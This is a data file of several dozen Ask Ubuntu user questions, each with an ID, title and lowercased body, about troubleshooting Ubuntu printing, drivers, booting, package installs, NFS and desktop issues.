352468	lpr not working - scheduler not responding	i 'm running ubuntu 13.04 on my computer at work , which has networked printers . i have previously been able to print using the lpr command , but recently this has stopped working . $ lpr test lpr : error - scheduler not responding . $ lpstat -t scheduler is running no system default destination lpstat : bad request lpstat : bad request lpstat : bad request lpstat : bad request lpstat : bad request $ ps aux | grep cups root 1153 0.0 0.1 73500 3552 ? ss sep08 0:01 /usr/sbin/cupsd -f root 1212 0.0 0.0 70428 1464 ? ss sep08 0:00 /usr/sbin/cups-browsed i also do n't see any printers if i enter the print dialog from a program ; i can only print to a pdf . does anyone know what 's gone wrong ? what config files do you need to see ? edit : i 'm adding some additional information . i 'm using a remote print server , and my ~/.cups/client.conf contains only this line : servername print1.eecis.udel.edu i tried removing the cups package and installing it again , and noticed during the installation the line '' lpinfo : bad request '' appeared .
352469	how can i install ubuntu 12.04 besides ubuntu 13.10	i have ubuntu 13.10 installed in my laptop ( lenovo u430 ) and i want to have ubuntu 12.04 also ( because of graphic drivers ) . when i try the live cd , it says i have no other os in my computer and that it 'll erase the disk . if i try to resize the partition ( lvm ) i can only reduce it in 50 mb , but i have around 300 gb of free space . is there any way around these problems ?
352470	how to compile realtek 8188ce wireless driver on ubuntu 13.04 ?	i 'm on a toshiba satellite c660_el trying to install the realtek 8188ce driver . lspci -v network controller : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter ( rev 01 ) however , i ca n't get the driver from there to compile ( i 've installed build-essentials already ) . running make ( with or without sudo makes no difference ) i get make -c /lib/modules/3.8.0-19-generic/build m=/root/rtl_driver modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.8.0-19-generic' cc [ m ] /root/rtl_driver/base.o in file included from /root/rtl_driver/base.c:39:0 : /root/rtl_driver/pci.h:247:15 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rtl_pci_probe’ make [ 2 ] : *** [ /root/rtl_driver/base.o ] error 1 make [ 1 ] : *** [ _module_/root/rtl_driver ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.8.0-19-generic' make : *** [ all ] error 2 there is a relevant ppa here : https : //launchpad.net/~lexical/+archive/hwe-wireless but there 's no 13.04 build . thanks in advance for any help !
352475	how can i combine multiple images into a single gimp file with the command line ?	how can i combine multiple jpegs into a single , layered xcf via the command line ? using gimp 's graphical interface i can choose file â¸ open as layers ... , but i do n't see an analogous command-line option . i 've tried combining the images using imagemagick but it does n't recognize xcf as an output format .
352479	server install of kvm and openstack without broadband	i 've always installed ubuntu desktop ( many versions and flavors ) with a decent internet connection , but now i find myself preparing for my first-ever server install ( 13.04 chosen for the need of grizzly ) , in a place without broadband . i therefore wish to prepare for installing everything from media , which i would download before i wander off to the boonies . how can i download all the files i would need for a complete open stack install , on a single machine , before i leave the blue blanket of my broadband connection ? once downloaded and a basic install performed , would i install additional packages needed by apt after revising /etc/apt/sources.lst to point to where the big pile o ' files be , or would i manually install each with dpkg , or , on the gripping hand , do it in a way i do not yet recognize ?
352480	gnome-clocks folder/file	i have five computers in my house and i wanted to set gnome-clocks with/from the master , having set the clock with 9 different cities i can not seem to find the file/folder to copy and install into the other 4 computers hoping someone can help , would be very much appreciated hazz
352481	can windows run on my computer while i am running ubuntu ?	two days ago i entered windows 7 and updates were already downloaded . i am somewhat paranoid , and that bothers me . i am getting ready to dismantle ms , but until then , someone let me know .
352483	problem booting up for the first time	i am a first time user of linux , tried to install ubuntu on my old computer that uses windows xp , restarted the computer when prompted to and selected ubuntu as the operating system . now it says logical block 47253 , buffer i/o error on device zram0 { 93.824548 }
352484	sublime text 2 crashes on startup	i installed sublime text 2 via apt-get as advised in the numerous answers in this question : how do i install sublime text 2 ? i used the following commands to install : sudo add-apt-repository ppa : webupd8team/sublime-text-2 sudo apt-get update sudo apt-get install sublime-text when i start it ( using terminal command 'sublime ' or the unity dock icon , i get the following error : unable to run package setup : traceback ( most recent call last ) : file `` ./packagesetup.py '' , line 165 , in upgrade upgradepackage ( pkg , pristinedir , datadir , backupdir ) file `` ./packagesetup.py '' , line 158 , in upgradepackage os.path.join ( backupdir , base ) , inhibitoverwrite ) file `` ./packagesetup.py '' , line 113 , in upgradearchive shutil.copy ( src , dst ) file `` .\shutil.py '' , line 88 , in copy file `` .\shutil.py '' , line 53 , in copyfile ioerror : [ errno 13 ] keine berechtigung : u'/home/noel/.config/sublime-text-2/pristine packages/text.sublime-package' '' keine berechtigung '' means `` no permission '' , fyi . ; ) before installing this via apt-get i had two failed installations ( both times the program itself ran fine , but i could n't save files . either the error was `` could n't save '' or `` could n't save , could n't create tmp-file '' ) . can you please help me get this thing finally working ? : / i 'm using 13.04 , by the way . edit : i now installed using the script kindly created by henriquemoody ( https : //gist.github.com/henriquemoody/3288681 ) and managed to get a working version of sublime running . this question could be considered as answered .
352494	something 's wrong with updates	ubuntu 13.04 . after sudo apt-get update , i see w : gpg error : http : //www.duinsoft.nl debs release : the following signatures could n't be verified because the public key is not available : no_pubkey e18ce6625cb26b26 w : failed to fetch http : //ppa.launchpad.net/screenlets/ppa/ubuntu/dists/raring/main/binary-amd64/packages 404 not found w : failed to fetch ppa.launchpad.net/screenlets/ppa/ubuntu/dists/raring/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . cyberproxy @ paradox : ~ $ after software updater , i get failed to download repository information .
352496	no bluetooth icon on top bar	i do n't have any bluetooth icons on my top bar and the bluetooth apps wo n't respond to anything . how do i fix this ?
352502	need help to install an app	i wanted to install file roller to extract .iso file . i found it .tar.zx . after extraction i tried to install it using terminal . after using ./configure i found this error configure : error : glib-compile-schemas not found . i used this command to fix it sudo apt-get update & & sudo apt-get install libglib2.0-dev but i found this error checking for gtk ... no configure : error : package requirements ( gtk+-3.0 > = 3.9.3 ) were not met : no package 'gtk+-3.0 ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables gtk_cflags and gtk_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . so please help me to fix this
352509	ubuntu crashes with high memory use without swapping	i 'm running some memory intensive calculations on ubuntu 13.04 . i have 8 gb of ram , and a swap partition with the same amount of memory . the hard disk and swap partition are encrypted . âş free -m total used free shared buffers cached mem : 7663 3773 3890 0 151 2099 -/+ buffers/cache : 1522 6141 swap : 7863 0 7863 i 've watched what happens several times in resource monitor . the swap is at zero when the process starts . the memory gradually fills up , and when ram features about 99 % , the computer freezes with high io wait on the hard disk . i 've read several other ask ubuntu questions , and tried changing vm.min_free_kbytes and vm.swappiness as recommended here , but it did n't work . what should i do ?
352511	`sudo apt-get update & & sudo apt-get upgrade` show no updates available for months on my computer	when i try to update my computer , it says no updates are available . this has been going on for months , and i 'm scratching my head -- there should be security patches at least . i 'm using ubuntu 12.04 precise pangolin .
352514	brightness not responsive	in ubuntu 13.04 , whenever i decrease brightness , it still stays at its highest , and wo n't decrease . what 's the fix ? info 13.04 , using gnome environment , but its ubuntu 13.04 . dell inspiron also , can not get updates at all '' failed to get repository information . '' sudo apt-get update also gives errors at end .
352521	webpages coming broken , not loading properly in 12.04	i am using ubuntu 12.04 lts for 5 months now and very recently i am facing a peculiar problem . web pages are loading but its broken . example : now what i need to do to fix the problem ? i have already tried : 1 ) clearing history , cookie and cache 2 ) same problem in chrome 3 ) no such problem in windows . so the problem is in ubuntu specifically . thanks .
352522	how to find snmp community string ?	i 'm running ubuntu 12.10 and i 'm trying to find my snmp community string . i followed the instructions here , but my /etc/snmp/snmpd.conf file has different contents than what they 're talking about . their snmpd.conf file : rocommunity [ community string ] mine : rocommunity public default -v systemonly that being the case , what is my community string ?
352527	codeblocks not running at all after installation	little history : codeblocks 10.05 used to run smoothly in my ubuntu . now , i downloaded the deb package of codeblocks 12.11 and installed . but mysteriously , it forgets my every modification every-time i close . so , i uninstalled the deb package , then autoremoved broken packages and then reinstalled codeblocks 10.05 . but i did n't get a happy ending . now codeblocks is installing properly . but if i click on the icon of codeblocks , it is not opening or not even responding at all . i even tried re-installing , same issue . note : it 's installing properly without any error message , just not running at all . no error message or anything .
352529	no message appears when using notify-send inside a service , why ?	i 'm developing a notification script which sends me messages from a json-file . i tried to run it as a service , as this seemed to be the easiest way to start and stop the script from he commands line . i have the following simple service : description `` notify me service '' author `` jo '' start on runlevel [ 2345 ] stop on runlevel [ 016 ] script exec /usr/bin/notify-send test > > /var/log/test.log 2 > & 1 end script the script seems to get run , as there are no errors whatsoever ( i also tested it with another script being called by the service ) , but no message appears . why is that ?
352530	how can i restore my unity ?	i ca n't restore my unity using reset root @ vitor : ~ # unity -- reset warning : unity currently default profile , so switching to metacity while resetting the values unity-panel-service : nenhum processo localizado checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins initializing core options ... done compiz ( core ) - warn : failed to receive configurenotify event on 0x2e000b8 initializing composite options ... done initializing opengl options ... done initializing decor options ... done initializing vpswitch options ... done initializing snap options ... done initializing mousepoll options ... done initializing resize options ... done initializing place options ... done initializing move options ... done initializing wall options ... done initializing grid options ... done initializing session options ... done initializing gnomecompat options ... done initializing animation options ... done initializing fade options ... done initializing unitymtgrabhandles options ... done initializing workarounds options ... done initializing scale options ... done compiz ( expo ) - warn : failed to bind image to texture initializing expo options ... done initializing ezoom options ... done ( compiz:2174 ) : gconf-critical ** : gconf_client_add_dir : assertion `gconf_valid_key ( dirname , null ) ' failed warn 2013-10-01 23:14:25 unity.favorites favoritestoregsettings.cpp:139 unable to load gdesktopappinfo for 'ubiquity-gtkui.desktop' error 2013-10-01 23:14:26 unity.launcher.trashlaunchericon trashlaunchericon.cpp:62 could not create file monitor for trash uri : operaă§ăło sem suporte initializing unityshell options ... done compiz ( core ) - warn : unhandled configurenotify on 0xe000a7 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . warn 2013-10-01 23:14:28 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/libreoffice-writer.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2013-10-01 23:14:28 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/libreoffice-calc.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2013-10-01 23:14:28 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/libreoffice-impress.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2013-10-01 23:14:28 unity < unknown > :0 unable to fetch children : nenhuma interface `` org.ayatana.bamf.view '' no objeto no caminho /org/ayatana/bamf/application0x1fbe000 warn 2013-10-01 23:14:28 unity < unknown > :0 failed to fetch path : nenhuma interface `` org.ayatana.bamf.application '' no objeto no caminho /org/ayatana/bamf/application0x1fbe000 warn 2013-10-01 23:14:28 unity < unknown > :0 unable to fetch children : nenhuma interface `` org.ayatana.bamf.view '' no objeto no caminho /org/ayatana/bamf/application0x1fbe000 warn 2013-10-01 23:14:28 unity < unknown > :0 failed to fetch icon : nenhuma interface `` org.ayatana.bamf.view '' no objeto no caminho /org/ayatana/bamf/application0x1fbe000 warn 2013-10-01 23:14:28 unity < unknown > :0 failed to fetch name : nenhuma interface `` org.ayatana.bamf.view '' no objeto no caminho /org/ayatana/bamf/application0x1fbe000 warn 2013-10-01 23:14:28 unity < unknown > :0 failed to fetch boolean : nenhuma interface `` org.ayatana.bamf.view '' no objeto no caminho /org/ayatana/bamf/application0x1fbe000 warn 2013-10-01 23:14:28 unity < unknown > :0 failed to fetch boolean : nenhuma interface `` org.ayatana.bamf.view '' no objeto no caminho /org/ayatana/bamf/application0x1fbe000 warn 2013-10-01 23:14:28 unity < unknown > :0 failed to fetch boolean : nenhuma interface `` org.ayatana.bamf.view '' no objeto no caminho /org/ayatana/bamf/application0x1fbe000 warn 2013-10-01 23:14:28 unity < unknown > :0 unable to fetch children : nenhuma interface `` org.ayatana.bamf.view '' no objeto no caminho /org/ayatana/bamf/application0x1fbe000 warn 2013-10-01 23:14:28 unity < unknown > :0 unable to fetch children : nenhuma interface `` org.ayatana.bamf.view '' no objeto no caminho /org/ayatana/bamf/application0x1fbe000 warn 2013-10-01 23:14:28 unity < unknown > :0 failed to fetch path : nenhuma interface `` org.ayatana.bamf.application '' no objeto no caminho /org/ayatana/bamf/application0x1fbe000 warn 2013-10-01 23:14:28 unity < unknown > :0 failed to fetch path : nenhuma interface `` org.ayatana.bamf.application '' no objeto no caminho /org/ayatana/bamf/application0x1fbe000 warn 2013-10-01 23:14:28 unity < unknown > :0 failed to fetch path : nenhuma interface `` org.ayatana.bamf.application '' no objeto no caminho /org/ayatana/bamf/application0x1fbe000 warn 2013-10-01 23:14:28 unity < unknown > :0 failed to fetch type : nenhuma interface `` org.ayatana.bamf.window '' no objeto no caminho /org/ayatana/bamf/window48234680 initializing staticswitcher options ... done setting update `` main_menu_key '' setting update `` run_key '' warn 2013-10-01 23:15:28 unity.glib.dbusproxy glibdbusproxy.cpp:283 calling method `` inforequest '' on object path : `` /net/launchpad/lens/video '' failed : gdbus.error : org.freedesktop.dbus.error.unknownmethod : no such interface `com.canonical.unity.lens ' on object at path /net/launchpad/lens/video warn 2013-10-01 23:15:28 unity.glib.dbusproxy glibdbusproxy.cpp:283 calling method `` setviewtype '' on object path : `` /net/launchpad/lens/video '' failed : gdbus.error : org.freedesktop.dbus.error.unknownmethod : no such interface `com.canonical.unity.lens ' on object at path /net/launchpad/lens/video ( firefox:2380 ) : gtk-critical ** : ia__gtk_clipboard_set_with_data : assertion `targets ! = null ' failed ( firefox:2380 ) : gtk-critical ** : ia__gtk_clipboard_set_with_data : assertion `targets ! = null ' failed i use ubuntu 12 for 64 bits .
352532	installing issue	traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 972 , in simulate trans.unauthenticated = self._simulate_helper ( trans ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 1096 , in _simulate_helper return depends , self._cache.required_download , \ file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 235 , in required_download pm.get_archives ( fetcher , self._list , self._records ) systemerror : e : i was n't able to locate a file for the ttf-mscorefonts-installer package . this might mean you need to manually fix this package .
352534	how do i find prop . drivers ?	i know how to get to the additional drivers menu , but there are no drivers listed . so , how do i make it find my hardware and give the option to install it ! ?
352536	ubuntu 13.04 boot disk hangs on underscore blinking , nvidia 780 gtx	during boot i see the f8 chose device screen , then i see the purple screen then i get a black screen with a little underscore in the top left flashing . it sounds like its loading but it just sits there on that screen flashing .
352539	installing postgres on 13.04 : no valid openpgp data found	following the ubuntugeek instructions for installing postgres on ubuntu 13.04 ( and reinforced here ) , i 'm getting stuck at this command : wget -- quiet -o - http : //apt.postgresql.org/pub/repos/apt/accc4cf8.asc | sudo apt-key add - my system is responding : gpg : no valid openpgp data found . in case it 's relevant , my pgdg.list file contains only this line : deb http : //apt.postgresql.org/pub/repos/apt/ precise-pgdg main what do i need to do to move forward ?
352540	yahoo home / mail stuck in `` waiting for yahoo.com '' in firefox with ubuntu 13.04	i am new to linux and chose ubuntu 13.04 as my first attempt on the os . so i kept a dual boot option with windows xp/ ubuntu 13.04 . now the issue is that when i try to open yahoo.com or mail.yahoo.com it is stuck in loading , indefinitely , no errors or warnings it just says waiting for yahoo.com . other sites load just fine in same browser like google , gmail , it loads fine in xp with firefox . i have tried the install/ remove unity-webapps-yahoomail fix to no avail . i have tried to connect via ip addess but doesnt connect so no dns issues . i can ping yahoo.com so no network issues though i use a dsl connection i have cleared the cache , history and cookies without any effect . i tried searching but could not find any solution or even why such a thing happens , it seems to plague only a `` limited '' number of people so if anyone has an answer or atleast why the problem exists please help , i would hate to have to keep xp just to open my mail . changed browser , no change still cant open the website , even tried ie 8 using wine to no avail . cant even add it to thunderbird .
352543	is it possible to install ubuntu 13.04 from 3 gb flashdrive	i want to install ubuntu ( fresh install ) but i only have this 3gb flash drive to install from.is it possible or do i have to go to the store ? and is it also possible to install from 4 gb ?
352544	can i use source test1.sh with gnome-terminal -x ?	i am executing 2 shell scripts from the main using source . main.sh : # /bin/sh a=1 b=2 c=3 gnome-terminal -x sh -c `` . ./test1.sh|less '' ( note the source `` . '' ) gnome-terminal -x sh -c `` . ./test2.sh|less '' ... ... test1.sh : # ! /bin/sh echo `` a= '' $ a # does n't print anything i was able to do following 2 separately but when i combine , i am not able to access variables of main into other files gnome-terminal -x sh -c `` test1.sh|less '' # able to execute in separate terminal . ./test1.sh # able to access variables from main.sh in test1.sh
352546	internal microphone is not working	basically i 'm pretty new to ubuntu and have tried a couple of solutions from this forum but no luck yet , i 'm currently using ubuntu 13.04 and i 've tried to use the mic on skype but it just wo n't work , it does n't seem to work from the system settings either .
352549	windows 8 and ubuntu are not getting along !	i just got my new laptop with windows 8 installed . i used to have a laptop with both windows 7 and ubuntu installed and loved it . so i wish to do the same with this computer . i downloaded the ubuntu 12.04 64bit iso and created a usb boot drive . after some complications with windows 8 and the ability to boot from a usb stick , i finally managed to install ubuntu . i selected the `` run alongside windows 8 '' option and selected the amount of space i wanted for the ubuntu partition . after the installation it asks to restart my computer . i said okay and had it restart . when the computer restarted it booted directly to windows 8 . i checked and saw that there was still a partition , so ubuntu is there . yet i can not boot it . i 've now tried the linux `` boot-repair '' ... the windows easybcd ... nothing works . with easybcd i always get an error on startup saying `` windows can not work '' something about a missing file . what 's going on ? and how do i fix this ? ps : sorry if i sound frustrated , i 've just been working on this for a while and its irritating to restart my computer 50 times haha thanks in advance !
352551	ubuntu ca n't see my second hard disk	i am a new ubuntu ( and linux ) user , this is my first attempt . i have a somewhat old acer intel core2 duo 2.20 ghzx2 with 3 gb ram , i have two hard disks installed on it , its original 80 gb ( sata ) hard disk which is drive c and recently i have installed a new seagate 1 tb ( sata ) which is drive d i installed ubuntu 12.04 using wubi from my windows vista , i opted to install it on drive d and allocated the maximum 30 gb space for it , currently drive d has around 750 gb free . i have two questions : my windows run as 32bit and as far as i know my desktop computer can not support 64bit , when i opened ubuntu system monitor it says ubuntu release 12.04 ( precise ) 64-bit , is this ok ? when i open the home folder i can see my original hard disk ( drive c ) but my seagate one ( drive d ) does n't show up , although in the system monitor 's system status i have available disk space : 719.5 gib , and when i go to any folder on computer ( like home , or documents ) and right-click and get properties it says free space 25.1 gib although the free space on drive c is 30 gib ( as confirmed by its properties from within home folder ) i as well have a 150gb external hard disk and it is recognised and show normally in home folder . i am not really literate with linux system , so this might be normal and that probably since ubuntu is installed on drive d it does n't need to show it , but i got puzzled with the 25.1 free space ... or is there something i should do to make it detect drive d. i have read the other topics a bit similar to this but found that most have a different case and the closest case to mine was an issue with ubuntu 13.04 sorry for the long post .
352560	file system becomes `` read-only '' on ubuntu 11.10 using ext4	i have been using ubuntu 11.01 with etx4 , i have several desktop pc 's all identical hardware right upto the ssd . the ubuntu os with the above spec has been cloned from a single image . i frequently experience hardware hangup issues , i can ssh into the systems but can not write to the disk as i get a `` read only '' file system warning . i have ran /forcefsk but after a few days the pc 's start giving the same problem . i can not say that the hardware or ssd 's are faulty because i have another set of pc 's with the same identical hw and ssd running on arch linux with ext3 and they are performing seamlessly for 200+days without a system reboot . when the system goes into a read-only state i get these errors in the log . oct 2 01:17:01 turret-flextouch cron [ 3739 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) oct 2 01:34:10 turret-flextouch kernel : [ 51699.040068 ] ata4.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x6 frozen oct 2 01:34:10 turret-flextouch kernel : [ 51699.040079 ] ata4.00 : failed command : write dma oct 2 01:34:10 turret-flextouch kernel : [ 51699.040093 ] ata4.00 : cmd ca/00:08:00:0a:04/00:00:00:00:00/e2 tag 0 dma 4096 out oct 2 01:34:10 turret-flextouch kernel : [ 51699.040096 ] res 40/00:00:00:4f : c2/00:00:00:00:00/00 emask 0x4 ( timeout ) oct 2 01:34:10 turret-flextouch kernel : [ 51699.040102 ] ata4.00 : status : { drdy } oct 2 01:34:10 turret-flextouch kernel : [ 51699.040114 ] ata4.00 : hard resetting link oct 2 01:34:10 turret-flextouch kernel : [ 51699.360026 ] ata4.01 : hard resetting link oct 2 01:34:11 turret-flextouch kernel : [ 51700.388023 ] ata4.01 : failed to resume link ( scontrol 0 ) oct 2 01:34:16 turret-flextouch kernel : [ 51705.584099 ] ata4.00 : link is slow to respond , please be patient ( ready=0 ) oct 2 01:34:20 turret-flextouch kernel : [ 51709.056025 ] ata4.00 : srst failed ( errno=-16 ) oct 2 01:34:20 turret-flextouch kernel : [ 51709.056038 ] ata4.00 : hard resetting link oct 2 01:34:20 turret-flextouch kernel : [ 51709.376026 ] ata4.01 : hard resetting link oct 2 01:34:21 turret-flextouch kernel : [ 51710.404023 ] ata4.01 : failed to resume link ( scontrol 0 ) oct 2 01:34:26 turret-flextouch kernel : [ 51715.600030 ] ata4.00 : link is slow to respond , please be patient ( ready=0 ) oct 2 01:34:30 turret-flextouch kernel : [ 51719.072024 ] ata4.00 : srst failed ( errno=-16 ) oct 2 01:34:30 turret-flextouch kernel : [ 51719.072036 ] ata4.00 : hard resetting link oct 2 01:34:30 turret-flextouch kernel : [ 51719.392026 ] ata4.01 : hard resetting link oct 2 01:34:31 turret-flextouch kernel : [ 51720.420023 ] ata4.01 : failed to resume link ( scontrol 0 ) oct 2 01:34:36 turret-flextouch kernel : [ 51725.616022 ] ata4.00 : link is slow to respond , please be patient ( ready=0 ) oct 2 01:35:05 turret-flextouch kernel : [ 51754.120026 ] ata4.00 : srst failed ( errno=-16 ) oct 2 01:35:05 turret-flextouch kernel : [ 51754.120038 ] ata4.00 : limiting sata link speed to 1.5 gbps oct 2 01:35:05 turret-flextouch kernel : [ 51754.120045 ] ata4.01 : limiting sata link speed to 1.5 gbps oct 2 01:35:05 turret-flextouch kernel : [ 51754.120053 ] ata4.00 : hard resetting link oct 2 01:35:05 turret-flextouch kernel : [ 51754.440025 ] ata4.01 : hard resetting link oct 2 01:35:06 turret-flextouch kernel : [ 51755.468025 ] ata4.01 : failed to resume link ( scontrol 0 ) has anyone faced this issue ?
352562	ca n't view in external display	i have installed ubuntu 13.04 desktop version in my comapq presario cq60-101au with 1gb ram 160 gb hdd amd athlon x2 64 bit inbulit with nvidia graphics . at firt when i have installed along with windowss to format all win files now i have only ubuntu ver for first two days it work nice in external monitor but when i have hitthe update . the updates are not fully completed properly .after i have shutdown my system then i logged into my system connect with external monitor i ca n't able to view in monitor . any one help me out wat to do . i 'm new to ubuntu.i have try out all shortcut used for make option in the system . it 's very important because my laptop screen has damaged a lot ca n't view full screen so please help me out
352565	newly installed kernels wo n't boot - what am i doing wrong ? ubuntu 13.04	i 've been trying to install an updated kernel on my fresh ubuntu gnome 13.04 installation , mainly because it purportedly fixes the display brightness issue on my dell xps 13 fhd . i 'm following the guides on ubuntuhandbook , such as this one : http : //ubuntuhandbook.org/index.php/2013/09/install-upgrade-kernel-3-11-2-ubuntu-linux-mint/ i follow the steps ( running update-grub2 at the end to be sure ) and it goes fine . the kernels all show up in the grub menu . however , when i pick any kernel other than the included 3.8.x , it gets stuck on `` loading linux ... '' and never proceeds to the ramdisk step , and never boots . i tried this with 3.10.13 , 3.11 , 3.11.2 and the same thing happens .
352568	issues with wifi	the title for this one might be misleading , i know that there are a number of questions related to wifi and connectivity issues , but , i 'm quite sure that this is a separate issue . in my college 's wi-fi system , we have a portal , one logs into the said portal and upon verification of your credentials , you can access the net . now , recently these guys decided to integrate a number of networks into one large , all-encompassing network , and since then accessing the net via ubuntu has become an extremely tedious task . here 's the weird part , at the same time if i boot into win7 , it works just fine , no issues whatsoever . i spoke to some other people too , and all those with ubuntu are facing this issue . i 'd really appreciate it if someone can suggest some fix to this issue because it 's rather stupid to log into windows just to access the net , seeing how all my work and basically everything is on my ubuntu system . my system is running on 12.04 .
352570	problem with ip openstack maas	so i 'm using ubuntu server 12.04lts and maas with juju openstack folsom . i 'm already have one problem with nova network . when i using quantum gateway in quotas show me fixed ip -1 . what 's the problem ?
352572	window snapping in lubuntu 13.10	i read that window snapping will be a default feature in lubuntu 13.10 . however , i 've installed it and i do n't have it . perhaps it 's disabled by default ? how would one enable it ?
352577	reinstalling/wipe hardrive/pre-existing ubuntu 13.04	i am trying to reinstall ubuntu 13.04 because i for lack of better terms `` effed up '' i have a cd/dvd with ubuntu 13.4 on it and i know it works because that 's how i installed this os on this new/fresh/hardware rig to begin with when i have the cd/dvd in and click reboot it just boots to my last installed version , how do i get it to access the cd/dvd to walk me thruough the installization again ?
352579	'vt-x/amd-v not operational ' error running ubuntu 13.04 gnome 64-bit on vb	when i start the vm , the following error appears - vt-x/amd-v hardware acceleration has been enabled , but is not operational . your 64-bit guest will fail to detect a 64-bit cpu and will not be able to boot . please ensure that you have enabled vt-x/amd-v properly in the bios of your host computer . i checked my bios but could not find any vt-x/amd-v option in there . can anyone help ? my processor is intel core2duo t7300 ( using lenovo thinkpad t61 , if it helps ) . host os - ubuntu 13.04 gnome 64-bit . guest os - ubuntu 13.04 gnome 64-bit . virtualbox version - 4.2.10
352580	install smoothdraw on ubuntu	i want to install smoothdraw in ubuntu so that i can make a few drawings and stuff . i have installed wine and installed smoothdraw however , it does not start when i double click on its icon ( on the desktop ) . i am on ubuntu 12.04 lts . please help me run it terminal output fixme : mscoree : configfilehandler_startelement unknown element l '' configsections '' in state 1 fixme : mscoree : configfilehandler_startelement unknown element l '' sectiongroup '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' section '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' usersettings '' in state 1 fixme : mscoree : configfilehandler_startelement unknown element l '' smoothdraw.properties.settings '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 wine : install mono for windows to run .net 2.0 applications .
352584	lockd freezes once or more per day	server has been running for over 1.5 years , with no problem . last week started receiving errors and workstations freeze : lockd : can not monitor statd : server rpc.statd not responding , timed out server : os : ubuntu 10.04.4 kernel : linux 2.6.32-51-server nfs-common 1:1.2.0-4ubuntu4.2 nfs-kernel-server 1:1.2.0-4ubuntu4.2 /home x.x.x.0/255.255.0.0 ( rw , no_root_squash , insecure , async , wdelay , no_subtree_check ) /public x.x.x.0/255.255.0.0 ( rw , no_root_squash , insecure , async , wdelay , no_subtree_check ) workstations : ubuntu 10.04.x server : /home /home nfs defaults 0 0 server : /public /mnt/public nfs defaults 0 0 ran rpcinfo -p both from workstations and from servers both return ok . while lockd frozen , server is 100 % accessible i.e ssh top df all return as expected . however the workstations are unable to move between desktops and become unresponsive , chrome stops functioning on server ps -aux | grep lockd shows that the lockd process is d. however after a couple of min lockd returns to s and r , and workstations are functional again after enabling nlm_debug i see that indeed the lockd process gets stuck i notice in the below log that the lockd gets stuck for a minute 02:03:21 -- 02:04:21 this repeats when the lockd gets stuck and i found that by rebooting the `` offending '' workstation the all systems return to function normally . oct 2 02:04:21 fs1 kernel : [ 647001.312596 ] lockd : request from 172.x.x.x , port=960 oct 2 02:04:21 fs1 kernel : [ 647001.312603 ] lockd : lock called oct 2 02:03:21 fs1 kernel : [ 646941.418685 ] lockd : nlmsvc_lookup_host ( host='roi-lnx ' , vers=4 , proto=tcp ) oct 2 02:03:21 fs1 kernel : [ 646941.418687 ] lockd : get host roi-lnx oct 2 02:03:21 fs1 kernel : [ 646941.418688 ] lockd : nlm_lookup_host found host roi-lnx ( 172.16.16.76 ) oct 2 02:03:21 fs1 kernel : [ 646941.418689 ] lockd : nsm_monitor ( roi-lnx ) oct 2 02:04:21 fs1 kernel : [ 647001.312552 ] statd : server rpc.statd not responding , timed out oct 2 02:04:21 fs1 kernel : [ 647001.312565 ] lockd : nsm upcall rpc failed , status=-5 oct 2 02:04:21 fs1 kernel : [ 647001.312570 ] lockd : can not monitor roi-lnx oct 2 02:04:21 fs1 kernel : [ 647001.312572 ] lockd : release host roi-lnx this looks like a bug in lockd . i have spent days looking though google , and there are a couple of similar cases but no fixes . please let me know if you have any suggestions to resolve this issue . thanks laurence
352585	how can i fix ? error : opening the cache	i 'm new to ubuntu.i installed the newest version two days ago . i used the software updater and when i restarted the computer the dash and launcher were missing . i tried reinstalling the os , the dash and launcher are back but now i have an error message and i do n't seem to be able to access the software centre or the software updater this is the error message : an error occurred , please run a package manager from the right-click menu or apt get in a terminal to see what is wrong . the error message was : 'error : opening the cache ( e : read error - read ( 5 : input/output error ) , e : the package list or status file could not be parsed or opened. ) ' . this usually means that your installed packages have unmet dependencies thanks
352591	how to type @ in ubuntu 12.04	i 'm from bosnia and i do n't know how to type @ in ubuntu . i 'm a newbie in ubuntu . i 'm using bosnian keyboard layout and my shortcut for typing @ is ctrl+alt+v .
352597	why do du -sh and the file manager disagree ?	i would like to know why the directory sizes i get when i execute du -sh disagree from the ones the file manager shows . what do they do differently and how big is my data really ? i am not so much interested in the size it takes on the disk ( because of blocks and stuff ) , i just want to know how big the actual data is .
